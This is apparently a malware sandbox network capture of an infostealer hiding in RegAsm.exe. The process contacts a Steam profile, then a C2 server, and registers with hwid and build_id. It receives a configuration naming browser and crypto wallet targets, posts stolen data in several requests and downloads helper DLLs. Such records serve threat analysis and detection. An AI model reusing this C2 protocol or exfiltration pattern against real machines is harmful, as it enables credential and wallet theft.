                                                                                                                                                                                                                                                  Mar 29, 2024 12:08:25.553910017 CET4434976678.46.229.36192.168.2.4
                                                                                                                                                                                                                                                  Mar 29, 2024 12:08:25.553981066 CET49766443192.168.2.478.46.229.36
                                                                                                                                                                                                                                                  Mar 29, 2024 12:08:26.602417946 CET49766443192.168.2.478.46.229.36
                                                                                                                                                                                                                                                  Mar 29, 2024 12:08:26.602433920 CET4434976678.46.229.36192.168.2.4
                                                                                                                                                                                                                                                  Mar 29, 2024 12:08:26.602601051 CET49766443192.168.2.478.46.229.36
                                                                                                                                                                                                                                                  Mar 29, 2024 12:08:26.602605104 CET4434976678.46.229.36192.168.2.4
                                                                                                                                                                                                                                                  Mar 29, 2024 12:08:27.279779911 CET4434976678.46.229.36192.168.2.4
                                                                                                                                                                                                                                                  Mar 29, 2024 12:08:27.279844999 CET4434976678.46.229.36192.168.2.4
                                                                                                                                                                                                                                                  Mar 29, 2024 12:08:27.279947042 CET49766443192.168.2.478.46.229.36
                                                                                                                                                                                                                                                  Mar 29, 2024 12:08:27.280128002 CET49766443192.168.2.478.46.229.36
                                                                                                                                                                                                                                                  Mar 29, 2024 12:08:27.280142069 CET4434976678.46.229.36192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 29, 2024 12:07:51.430758953 CET | 57021 | 53 | 192.168.2.4 | 1.1.1.1
Mar 29, 2024 12:07:51.525804043 CET | 53 | 57021 | 1.1.1.1 | 192.168.2.4

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Mar 29, 2024 12:07:51.430758953 CET | 192.168.2.4 | 1.1.1.1 | 0x9c98 | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Mar 29, 2024 12:07:51.525804043 CET | 1.1.1.1 | 192.168.2.4 | 0x9c98 | No error (0) | steamcommunity.com | | 104.112.44.153 | A (IP address) | IN (0x0001) | false
                                                                                                                                                                                                                                                  • steamcommunity.com
                                                                                                                                                                                                                                                  • 78.46.229.36
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49731 | 104.112.44.153 | 443 | 7564 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | Bytes transferred | Direction | Data
2024-03-29 11:07:51 UTC | 119 | OUT | GET /profiles/76561199658817715 HTTP/1.1
                                                                                                                                                                                                                                                  Host: steamcommunity.com
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
2024-03-29 11:07:52 UTC | 1882 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
                                                                                                                                                                                                                                                  Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Date: Fri, 29 Mar 2024 11:07:52 GMT
                                                                                                                                                                                                                                                  Content-Length: 34657
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Set-Cookie: sessionid=b8124e20d16c3d1e96e169c7; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                                  Set-Cookie: steamCountry=US%7C4501bef07644d0152615a97beef5c423; Path=/; Secure; HttpOnly; SameSite=None
2024-03-29 11:07:52 UTC | 14502 | IN |
Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-03-29 11:07:52 UTC | 10074 | IN |
Data Ascii: '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role="navigation" id="global_action_menu" aria-label="Account Menu"><a class="header_installsteam_btn header_insta
2024-03-29 11:07:52 UTC | 10081 | IN |
Data Ascii: :\/\/store.cloudflare.steamstatic.com\/&quot;,&quot;PUBLIC_SHARED_URL&quot;:&quot;https:\/\/community.cloudflare.steamstatic.com\/public\/shared\/&quot;,&quot;COMMUNITY_BASE_URL&quot;:&quot;https:\/\/steamcommunity.com\/&quot;,&quot;CHAT_BASE_URL&quot;:&q


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49732 | 78.46.229.36 | 443 | 7564 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | Bytes transferred | Direction | Data
2024-03-29 11:07:52 UTC | 218 | OUT | GET / HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 78.46.229.36
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
2024-03-29 11:07:53 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Date: Fri, 29 Mar 2024 11:07:53 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  2024-03-29 11:07:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49736 | 78.46.229.36 | 443 | 7564 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-03-29 11:07:53 UTC | 310 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----KEBGHCBAEGDHIDGCBAEC
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Host: 78.46.229.36
Content-Length: 279
Connection: Keep-Alive
Cache-Control: no-cache
2024-03-29 11:07:53 UTC | 279 | OUT | Data Ascii: ------KEBGHCBAEGDHIDGCBAECContent-Disposition: form-data; name="hwid"D9C3642321301399609336-a33c7340-61ca-11ee-8c18-806e6f6e6963------KEBGHCBAEGDHIDGCBAECContent-Disposition: form-data; name="build_id"90027e35f6cb548480a6fb8bd7cde0cf------
2024-03-29 11:07:54 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 29 Mar 2024 11:07:54 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-03-29 11:07:54 UTC | 67 | IN | Data Raw: 33 38 0d 0a 31 7c 31 7c 31 7c 30 7c 61 35 35 36 35 65 31 35 33 31 36 35 34 35 38 37 38 33 39 37 39 66 38 39 31 35 63 65 38 31 65 30 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 0d 0a 30 0d 0a 0d 0a
Data Ascii: 381|1|1|0|a5565e153165458783979f8915ce81e0|1|1|1|0|0|500000


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49740 | 78.46.229.36 | 443 | 7564 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-03-29 11:07:54 UTC | 310 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----JKJDAEBFCBKECBGDBFCF
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Host: 78.46.229.36
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-03-29 11:07:54 UTC | 331 | OUT | Data Ascii: ------JKJDAEBFCBKECBGDBFCFContent-Disposition: form-data; name="token"a5565e153165458783979f8915ce81e0------JKJDAEBFCBKECBGDBFCFContent-Disposition: form-data; name="build_id"90027e35f6cb548480a6fb8bd7cde0cf------JKJDAEBFCBKECBGDBFCFCont
2024-03-29 11:07:55 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 29 Mar 2024 11:07:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-03-29 11:07:55 UTC | 1564 | IN | Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49741 | 78.46.229.36 | 443 | 7564 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-03-29 11:07:55 UTC | 310 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----KEGIDHJKKJDGCBGCGIJK
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Host: 78.46.229.36
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-03-29 11:07:55 UTC | 331 | OUT | Data Ascii: ------KEGIDHJKKJDGCBGCGIJKContent-Disposition: form-data; name="token"a5565e153165458783979f8915ce81e0------KEGIDHJKKJDGCBGCGIJKContent-Disposition: form-data; name="build_id"90027e35f6cb548480a6fb8bd7cde0cf------KEGIDHJKKJDGCBGCGIJKCont
2024-03-29 11:07:56 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 29 Mar 2024 11:07:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-03-29 11:07:56 UTC | 5165 | IN | Data Ascii: 1420TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49743 | 78.46.229.36 | 443 | 7564 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-03-29 11:07:57 UTC | 311 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----IIJDBGDGCGDAKFIDGIDB
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Host: 78.46.229.36
Content-Length: 7117
Connection: Keep-Alive
Cache-Control: no-cache
2024-03-29 11:07:57 UTC | 7117 | OUT | Data Ascii: ------IIJDBGDGCGDAKFIDGIDBContent-Disposition: form-data; name="token"a5565e153165458783979f8915ce81e0------IIJDBGDGCGDAKFIDGIDBContent-Disposition: form-data; name="build_id"90027e35f6cb548480a6fb8bd7cde0cf------IIJDBGDGCGDAKFIDGIDBCont
2024-03-29 11:07:57 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 29 Mar 2024 11:07:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-03-29 11:07:57 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49746 | 78.46.229.36 | 443 | 7564 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-03-29 11:07:58 UTC | 226 | OUT | GET /sqlm.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Host: 78.46.229.36
Connection: Keep-Alive
Cache-Control: no-cache
2024-03-29 11:07:58 UTC | 248 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 29 Mar 2024 11:07:58 GMT
Content-Type: application/octet-stream
Content-Length: 2459136
Last-Modified: Mon, 25 Mar 2024 09:53:07 GMT
Connection: close
ETag: "66014983-258600"
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49749 | 78.46.229.36 | 443 | 7564 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-03-29 11:08:00 UTC | 311 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----CFCBFHJECAKEHIECGIEB
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Host: 78.46.229.36
Content-Length: 4677
Connection: Keep-Alive
Cache-Control: no-cache
2024-03-29 11:08:00 UTC | 4677 | OUT | Data Ascii:
------CFCBFHJECAKEHIECGIEB
Content-Disposition: form-data; name="token"

a5565e153165458783979f8915ce81e0
------CFCBFHJECAKEHIECGIEB
Content-Disposition: form-data; name="build_id"

90027e35f6cb548480a6fb8bd7cde0cf
------CFCBFHJECAKEHIECGIEB
Cont
2024-03-29 11:08:01 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 29 Mar 2024 11:08:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-03-29 11:08:01 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49750 | 78.46.229.36 | 443 | 7564 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-03-29 11:08:01 UTC | 311 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----KJDGDBFBGIDGIEBGHCGI
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Host: 78.46.229.36
Content-Length: 1529
Connection: Keep-Alive
Cache-Control: no-cache
2024-03-29 11:08:01 UTC | 1529 | OUT | Data Ascii:
------KJDGDBFBGIDGIEBGHCGI
Content-Disposition: form-data; name="token"

a5565e153165458783979f8915ce81e0
------KJDGDBFBGIDGIEBGHCGI
Content-Disposition: form-data; name="build_id"

90027e35f6cb548480a6fb8bd7cde0cf
------KJDGDBFBGIDGIEBGHCGI
Cont
2024-03-29 11:08:02 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 29 Mar 2024 11:08:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-03-29 11:08:02 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  9192.168.2.44975178.46.229.364437564C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-03-29 11:08:02 UTC310OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----GHDHDBAECGCAFHJJDAKF
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 78.46.229.36
                                                                                                                                                                                                                                                  Content-Length: 437
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Data Ascii: ------GHDHDBAECGCAFHJJDAKFContent-Disposition: form-data; name="token"a5565e153165458783979f8915ce81e0------GHDHDBAECGCAFHJJDAKFContent-Disposition: form-data; name="build_id"90027e35f6cb548480a6fb8bd7cde0cf------GHDHDBAECGCAFHJJDAKFCont
2024-03-29 11:08:03 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Date: Fri, 29 Mar 2024 11:08:03 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
2024-03-29 11:08:03 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49752 | 78.46.229.36 | 443 | 7564 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-03-29 11:08:03 UTC | 310 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----CAAKKFHCFIECAAAKEGCF
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 78.46.229.36
                                                                                                                                                                                                                                                  Content-Length: 437
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Data Ascii: ------CAAKKFHCFIECAAAKEGCFContent-Disposition: form-data; name="token"a5565e153165458783979f8915ce81e0------CAAKKFHCFIECAAAKEGCFContent-Disposition: form-data; name="build_id"90027e35f6cb548480a6fb8bd7cde0cf------CAAKKFHCFIECAAAKEGCFCont
2024-03-29 11:08:04 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Date: Fri, 29 Mar 2024 11:08:04 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
2024-03-29 11:08:04 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 49753 | 78.46.229.36 | 443 | 7564 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-03-29 11:08:04 UTC | 205 | OUT | GET /freebl3.dll HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 78.46.229.36
                                                                                                                                                                                                                                                  Cache-Control: no-cache
2024-03-29 11:08:05 UTC | 246 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Date: Fri, 29 Mar 2024 11:08:05 GMT
                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                  Content-Length: 685392
                                                                                                                                                                                                                                                  Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  ETag: "6315a9f4-a7550"
                                                                                                                                                                                                                                                  Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 49754 | 78.46.229.36 | 443 | 7564 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-03-29 11:08:08 UTC | 205 | OUT | GET /mozglue.dll HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 78.46.229.36
                                                                                                                                                                                                                                                  Cache-Control: no-cache
2024-03-29 11:08:08 UTC | 246 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Date: Fri, 29 Mar 2024 11:08:08 GMT
                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                  Content-Length: 608080
                                                                                                                                                                                                                                                  Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  ETag: "6315a9f4-94750"
                                                                                                                                                                                                                                                  Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 49755 | 78.46.229.36 | 443 | 7564 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-03-29 11:08:09 UTC | 206 | OUT | GET /msvcp140.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Host: 78.46.229.36
Cache-Control: no-cache
2024-03-29 11:08:10 UTC | 246 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 29 Mar 2024 11:08:10 GMT
Content-Type: application/octet-stream
Content-Length: 450024
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
Connection: close
ETag: "6315a9f4-6dde8"
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.4 | 49757 | 78.46.229.36 | 443 | 7564 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | Bytes transferred | Direction | Data
2024-03-29 11:08:11 UTC | 202 | OUT | GET /nss3.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Host: 78.46.229.36
Cache-Control: no-cache
2024-03-29 11:08:12 UTC | 248 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 29 Mar 2024 11:08:12 GMT
Content-Type: application/octet-stream
Content-Length: 2046288
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
Connection: close
ETag: "6315a9f4-1f3950"
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.4 | 49758 | 78.46.229.36 | 443 | 7564 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | Bytes transferred | Direction | Data
2024-03-29 11:08:14 UTC | 206 | OUT | GET /softokn3.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Host: 78.46.229.36
Cache-Control: no-cache
2024-03-29 11:08:14 UTC | 246 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 29 Mar 2024 11:08:14 GMT
Content-Type: application/octet-stream
Content-Length: 257872
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
Connection: close
ETag: "6315a9f4-3ef50"
Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Data Ascii: USWVu@$xTv4{F4^@KN@P|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4|~
                                                                                                                                                                                                                                                  2024-03-29 11:08:15 UTC16384INData Raw: 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb 25 8b 18 85 f6 75 a1 8b 4b 14 ff 15 00 a0 03 10 ff
                                                                                                                                                                                                                                                  Data Ascii: <^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1%uK


Session ID: 16
Source IP: 192.168.2.4
Source Port: 49759
Destination IP: 78.46.229.36
Destination Port: 443
PID: 7564
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | Bytes transferred | Direction | Data
2024-03-29 11:08:15 UTC | 210 | OUT | GET /vcruntime140.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Host: 78.46.229.36
Cache-Control: no-cache
2024-03-29 11:08:16 UTC | 245 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 29 Mar 2024 11:08:16 GMT
Content-Type: application/octet-stream
Content-Length: 80880
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
Connection: close
ETag: "6315a9f4-13bf0"
Accept-Ranges: bytes


Session ID: 17
Source IP: 192.168.2.4
Source Port: 49760
Destination IP: 78.46.229.36
Destination Port: 443
PID: 7564
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | Bytes transferred | Direction | Data
2024-03-29 11:08:17 UTC | 311 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----JDAFHCGIJECFHIDGDBKE
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Host: 78.46.229.36
Content-Length: 1145
Connection: Keep-Alive
Cache-Control: no-cache
2024-03-29 11:08:17 UTC | 1145 | OUT | Data Ascii:
------JDAFHCGIJECFHIDGDBKE
Content-Disposition: form-data; name="token"

a5565e153165458783979f8915ce81e0
------JDAFHCGIJECFHIDGDBKE
Content-Disposition: form-data; name="build_id"

90027e35f6cb548480a6fb8bd7cde0cf
------JDAFHCGIJECFHIDGDBKE
Cont
2024-03-29 11:08:18 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 29 Mar 2024 11:08:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-03-29 11:08:18 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID: 18
Source IP: 192.168.2.4
Source Port: 49761
